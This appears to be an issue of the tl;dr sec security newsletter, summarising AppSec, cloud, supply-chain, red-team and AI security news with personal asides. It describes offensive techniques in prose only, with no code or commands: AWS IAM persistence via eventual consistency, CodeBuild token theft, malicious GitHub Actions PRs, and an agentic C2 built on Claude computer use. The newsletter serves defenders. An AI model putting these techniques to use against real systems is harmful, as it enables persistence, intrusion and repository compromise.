• tl;dr sec
  • Posts
  • [tl;dr sec] #324 - OpenAI's GPT-5.4-Cyber, Solve by Default, GitHub Action Security

[tl;dr sec] #324 - OpenAI's GPT-5.4-Cyber, Solve by Default, GitHub Action Security

OpenAI's new cyber-focused model and early access program, how to solve instead of defer tasks, securing GitHub Actions

Hey there,

I hope you’ve been doing well!

🎭️ Backstage Tour

Last weekend one of the primary San Francisco theaters (the Orpheum) had an open house where you could go on the stage, backstage, everywhere. It was awesome 😍 

There was a magical moment of standing on the stage, and then seeing them raise the curtain.

I went downstairs backstage and saw the electronics/lighting room, stood in the pit where the orchestra plays, saw the (surprisingly small) dressing rooms with the mirrors, and more.

Some fun facts I learned:

  • Everything you need to put on a given musical travels with the show in shipping trucks, including all of the set pieces, costumes, props, lighting, etc.

  • For “smaller shows” that are maybe ~7-12 trucks worth, they arrive at a new venue at say 8am, the crew rapidly sets everything up, breaks for dinner at 5pm, then puts on the first show at 7pm that night 🤯 

  • ~60-80% of the behind the scenes folks are local to that theater, and they don’t know the show at all yet opening night. So there’s a handful of folks traveling with the show who are orchestrating everything so it’s set up properly.

  • The folks on lights have ear pieces, and while they’re learning a new show they may just get guidance from the stage manager like, “OK your next cue is you’re going to pick up stage right a man in blue clothing, 50% brightness, these light settings.” But they don’t know which character it is so they’re just kinda guessing at first.

  • Actors often change in almost pitch darkness (except for some lighting they wear around their head) so the light doesn’t bleed on to the stage.

I also saw a “quick change” demo. Sometimes actors only have a few moments to change, so they did a demo of a <1 minute wardrobe change.

There’s actually a ton of prep and thoughtfulness that goes into orchestrating a quick change: how the pants or dress are “pooled” on the ground so you can just step in, how the boots are positioned so they don’t catch on the clothes, how the top layers are laid down to minimize rotation and movement when putting them on, and how there can be one (or more) wardrobe people helping the actors put everything on. Whoa.

Meanwhile, I put on my own clothes like a plebe.

As you might suspect, cybersecurity is just my bridge career, until I get into the stable, lucrative theater or screen industries 👨‍🎤 

Sponsor

📣 Secure Coding from Design to Deployment

Secure coding starts long before production. 

Modern applications move fast, which means security needs to be built in from the start, not added later. From API design to input handling and access control, early decisions have a big impact on reducing risk.

The Secure Coding Best Practices Cheat Sheet covers key areas like secure design foundations, strong authentication and authorization, input validation, and preventing common vulnerabilities such as XSS, SQL injection, and broken access control.

Reduce risk early with practical secure coding and design best practices.

I love me a good cheat sheet, and I like the focus on secure by design and the most common vulnerability classes 👌 

AppSec

I've Completely Changed How I Work
Friend of the newsletter Scott Behrens, Principal Security Engineer at Netflix, describes how he’s adopted a "solve by default" mindset using AI coding agents to directly implement solutions rather than filing tickets or waiting for other teams. Scott gives an example of playing around with building a user-friendly sandbox, noticed some GoLang services he was sandboxing didn’t support proxies, so he cloned the repo, had Claude understand the codebase and conventions, built a proxy feature fix with tests and documentation, and got the PR merged in ~1 hour. This approach extends to security assessments, data analysis, and operational tasks.

  • Turn meetings into tangible products - Scott has an AI notetaker in meetings, which he can then use a prompt to turn that into a PRD which his agents can then start building immediately after the meeting.

  • Turn memos into implementations - “When I think of defaulting to writing something down, or someone shares a strategy doc, problem statement, idea, etc., I immediately ask Claude, “Let's take the relevant part of this and turn it into an implementation.”

Solve By Default
Follow-post by Scott Behrens continuing his “solve by default” thread, which he defines as: “when problems emerge that you traditionally wouldn't solve (e.g., execution risks, legacy organizational red tape/paperwork, limited bandwidth), you now solve them with genAI.” Scott shares practical examples including: turning ideas from a meeting into a PRD and having the Superpowers brainstorming plugin help flesh it out then execute, noting and immediately fixing microcuts and nags discovered during pairing sessions, using your agent to turn Slack discussions into GitHub issues to save the ideas, and having agents optimize slow builds, painful runbooks, slow on-call processes, etc.

Scott recommends seeking high-value problems by examining product briefs, incident trends, tech debt backlogs, and gaps between team charters, while avoiding low-impact work by evaluating value, scope, complexity, and leverage before committing time.

I watched all 11 main stage keynotes
Adrian Sanabria watched all 11 RSAC 2026 main stage keynotes (YouTube playlist) and lived to tell the tale and kindly gives us an overview. People generally agreed that AI agents must be secured immediately, but no one has figured out how yet (key challenges: asset discovery, data permissions modeling, output validation, auditability of AI reasoning, compliance and the integrity problem where agents fabricate data indistinguishably from real retrieval).

Speakers disagreed on fundamental architecture questions like whether agents should be ephemeral (container-like, just-in-time with minimal access) versus long-lived digital co-workers, and whether human-in-the-loop is essential or an unscalable stopgap, though most agreed detection and response must merge into a single automated step given breakout times are sometimes now measured in seconds.

“If you plan on watching these keynotes, don’t base a drinking game on machine speed, agentic, real-time, or human-in-the-loop.”

Sponsor

📣 Cybercrime Just Hit Escape Velocity (Here’s the Evidence)

Flashpoint just released its 2026 Global Threat Intelligence Report, and the data is shocking.

  • AI-related illicit activity surged 1,500% in a single month

  • 3.3B compromised credentials are now fueling identity-based attacks

  • Ransomware incidents increased 53% as groups pivot toward pure-play extortion

The report also explores how threat actors are moving from generative tools to agentic AI frameworks that can automate attacks at scale.

👉 View Report 👈

Whoa, that’s some huge growth. Also, I’m curious to learn more about how threat actors are adopting autonomous agents 😅 

Cloud Security

Fighting Eventual Consistency-Based Persistence - An Analysis of notyet
Sonrai Security's Nigel Sood describes his red-blue collaboration with OFFENSAI’s Eduard Agavriloae on notyet (referenced in last week’s issue), an open-source tool that exploits AWS IAM's eventual consistency propagation window to automatically maintain admin persistence by detecting and reversing containment actions within seconds.

Nigel tested nearly a dozen IR techniques against notyet and found that standard AWS-recommended containment methods, including inline policy deletion/modification, managed policy attachments, permission boundaries, group membership changes, access key deactivation, role deletion, and SSM runbooks like AWSSupport-ContainIAMPrincipal, were all ineffective as notyet detected and reversed them within the consistency window. Only Service Control Policies (SCPs) successfully contained notyet, as member account identities cannot modify SCP attachments even with * permissions.

Part 2: AWS CodeBuild (Escalating Privileges via AWS CodeConnections)
Thomas Preece discovered that from an unprivileged AWS CodeBuild job using CodeConnections, you can call an undocumented API to retrieve raw GitHub App tokens or BitBucket JWT App tokens with the full permissions of the installed CodeConnection App. The app generally has read, write and admin permissions on all repos under your organization. See AWS-CodeBuild-HTTP-Intercept-Image for a container image for CodeBuild that allows you to get network monitoring in place before CodeBuild starts your build.

So basically your CodeConnection setup could mean you are one breached build job away from having every repo in your organization compromised 😅 AWS are not planning to fix this issue as they say CodeBuild is a "trusted environment."

💡 Great detailed write-up and walk through of examining how a third party system works internally 👍️ 

Supply Chain

Primer on GitHub Actions Security - Threat Model, Attacks and Defenses
Wiz’s Shay Berkovich describes the GitHub Actions threat model, three main risks (Pull Request pwnage, script injection, 3rd party components), and a defensive playbook.

The post discusses 8 dangerous triggers (including pull_request_target), how script injection occurs when untrusted inputs like branch names or issue titles are directly embedded in bash commands without environment variable binding, and how compromised third-party actions cascade through dependency chains, like when attackers sequentially compromised four Actions to reach Coinbase.

Six Accounts, One Actor: Inside the prt-scan Supply Chain Campaign
Wiz’s Rami McCarthy, Hila Ramati, Scott Piper, and Benjamin Read uncovered six total waves of activity from the same threat actor who was compromising GitHub repos via the pull_request_target workflow trigger. The attacker opened over 500 malicious PRs using AI-generated, language-aware payloads (conftest.py, package.json, build.rs, Makefile injections). Across over 450 analyzed exploit attempts, they observed a <10% overall success rate due to misunderstandings of GitHub's permission model.

“High-value targets including Sentry, OpenSearch, IPFS, NixOS, Jina AI, and recharts all successfully blocked the attack through a combination of first-time contributor approval gates, actor-restricted workflows, and path-based trigger conditions.”

💡 What’s interesting to me here is: 1) the likely use of AI to deliver customized, language-aware payloads. AI is great at writing code, I imagine with the right harness and scaffolding you could create reliable, per-project payloads.

2) 90% of the attacks failed due to misunderstanding GitHub’s permission model. In other words, unforced error. But the threat actors are rapidly iterating and improving, they won’t make this many mistakes in the future. I’m surprised they didn’t do more testing before attacking more broadly. Unless this is their small scale testing 😅 

Chainguard’s Assemble 2026
Chainguard now has: Libraries (Python, JavaScript, and Java packages built from verified source), Actions (secure-by-default CI/CD workflows), hardened Agent Skills, OS Packages (30,000+ zero-CVE packages for building secure custom images), Commercial Builds (Chainguard’s hardened version of commercial software like GitLab and Elastic).

💡 It’s neat to see how Chainguard took the idea of “let’s just give you 0 CVE containers so you don’t need to worry about it,” built a complex software factory to make it happen, then are now applying that concept to other domains. The product-specific posts share some interesting details about how they do it. I’m bullish on AI-powered hardening at scale, and approaches that solve classes of risks for users. Nice work.

Blue Team

MITRE Fight Fraud Framework
MITRE has released the Fight Fraud Framework™️ (F3), a free, open knowledge base documenting tactics and techniques used by financial fraud actors based on real-world cyber fraud incidents. The framework maps fraud-specific behaviors and references applicable MITRE ATT&CK techniques where relevant, providing a common taxonomy for describing fraud incidents.

YARAHQ/yara-rule-skill
By Florian Roth and Thomas Roccia: An LLM Agent Skill for expert YARA rule authoring, review, and optimization. Embeds industry best practices from the creator of YARA-Forge and yaraQA into your AI assistant's context. It enables natural language rule writing, review, and optimization.

Little Snitch for Linux
Little Snitch for Linux (GitHub) uses eBPF to monitor and control outgoing network connections, providing a web UI that shows which applications are connecting to which servers, with support for custom rules and automatic blocklist updates. The tool can filter by process, port, and protocol, displays traffic history and data volumes, and accepts blocklists in formats like domain-per-line, /etc/hosts, and CIDR ranges.

Red Team

Building Agentic C2 with Computer Use Agents
BeyondTrust’s Ryan Hausknecht describes a proof-of-concept command-and-control (C2) architecture using Claude's computer use capability, where a C# implant on the target endpoint executes AI-driven actions via Windows APIs (SetCursorPos, SendInput) or pyautogui. To avoid direct connections to Anthropic's API, Ryan used Azure Storage blobs as a dead drop for command polling and Azure Function Apps as a proxy to append API keys, ensuring all traffic appears to originate from Azure.

Claude takes screenshots to determine screen resolution and element positioning, then issues click and keypress commands that flow through the function app back to the implant. This architecture keeps API keys off the endpoint and makes network traffic blend in with normal Azure communications.

Janus: Listen to Your Logs
SpecterOps's Gavin Kramer introduces Janus, an open-source tool that parses C2 logs from Mythic, Cobalt Strike, and Ghostwriter to surface operational friction like failed commands, retries, and tool failures that typically get lost in deleted logs. Janus shows your team where your tooling breaks, where operators lose time, and what you could automate next.

Janus helps them understand:

  • Which tools should be updated vs. retired

  • When and why tool failures occur

  • Which techniques are being improvised due to missing capabilities

  • What arguments caused a Beacon object file (BOF) to crash an agent

  • What command ran before a callback stopped checking in

  • What activity later correlated with detection or prevention

“Janus gives leadership the data layer that has been missing, and it answers:”

  • How much time (and therefore cost) is lost to tool failures, retries, and operator workarounds

  • Which parts of the engagement hold the most variability in timelines and delivery?

  • Where are we paying an “efficiency tax” due to unreliable tooling?

💡 I like this meta idea a lot: collecting logs (or whatever artifact is relevant) from your and your colleagues’ work to automatically surface friction and opportunity for automation. This applies to any area of security, not just red teams.

I feel like this meta idea connects to Scott’s “solve by default” posts at the top- imagine continuously gathering friction points from your security team, developers, or customers and semi-automatically and quickly resolving the paper cuts.

AI + Security

Trusted access for the next era of cyber defense
OpenAI is scaling their Trusted Access for Cyber (TAC) program to thousands of verified defenders and launching GPT-5.4-Cyber, a fine-tuned variant of GPT-5.4 with reduced refusals for cybersecurity tasks and new binary reverse engineering capabilities. OpenAI is using strong Know Your Customer (KYC) and identity verification to limit advanced capabilities to trusted parties, and is giving targeted grants⁠, contributing to open-source security initiatives, and investing in Codex Security to help defenders more rapidly find and patch vulnerabilities.

💡 Perhaps GPT-5.4-Cyber should have been the name for their erotica chatbot 🤔 Jokes aside, it’s great to see OpenAI investing in securing the software ecosystem, supporting defenders, and releasing higher capability models carefully.

The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program
New ~30 page Cloud Security Alliance whitepaper from Gadi Evron, Rich Mogull, Robert T. Lee, and a huge list of other contributors authors. A briefing for security leaders on how AI-driven vulnerability discovery is reshaping the defender timeline, the operating model of vulnerability management, and the minimum actions required now. Nice overview of recent events and important things to consider for your security program. See:

  • p15 - 10 Questions to Understand Your Security Program State and Influence

  • p16 - A Mythos-ready Security Program Risk Register

  • p19 - Priority Actions for a Mythos-ready Security Program

4x Velocity, 10x Vulnerabilities: AI Coding Assistants Are Shipping More Risks
Apiiro’s Itay Nussbaum shares results from analyzing the impact of AI coding assistants across tens of thousands of repositories in Fortune 50 orgs. They found AI-assisted developers produced 3-4x more commits, but they were packaged into fewer PRs. By June 2025, AI-generated code was introducing over 10,000 new security findings per month across the repos in their study, a 10x spike in just six months compared to December 2024.

Interestingly, the types of flaws introduced by AI are different, for example, privilege escalation paths jumped 322%, and architectural design flaws spiked 153% (I’d like to know more about these are defined/measured).

💡 Long term I believe coding agents + security orchestration around them will make code more, not less secure, but it’s great to see some stats and investigation on the challenges we’re facing now.

Misc

Misc

AI

Politics

  • Crypto currency industry bribing donating to politicians

  • Ukraine tips drone war in its favor - “Starting from December, our unmanned systems units have neutralized more enemy personnel than they recruit to their ranks.”

  • How Trump Took the U.S. to War With Iran - Israel’s Netanyahu made the hard sell. The CIA director described the Israeli prime minister’s regime change scenarios as “farcical.” Tucker Carlson warned Trump that a war with Iran would destroy his presidency. “I know you’re worried about it, but it’s going to be OK,” the president said. Mr. Carlson asked how he knew. “Because it always is.”

    • “Everyone deferred to the president’s instincts. They had seen him make bold decisions, take on unfathomable risks and somehow come out on top. No one would impede him now.”

  • Civilization Is Not the Default. Violence Is. - On feudalism, Pax Americana and the changing world order.

  • US ban on Chinese fixed spy cameras led to a rising drone threat - “The rise of drone security incidents corresponds almost exactly to the US 2019 ban on Chinese cameras at American military bases.”

  • Steve Blank - Nowhere is Safe - “The U.S. has discovered that 1) air superiority and missile defense systems designed to counter tens or hundreds of aircraft and missiles is insufficient against asymmetric attacks of thousands of drones. And that 2) undefended high value fixed civilian infrastructure – oil tankers, data centers, desalination plants, oil refineries, energy nodes, factories, et al -are all at risk…the lessons from Iran’s attacks on infrastructure in the Gulf Cooperation Council countries is that anything on the surface is going to be a target.”

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋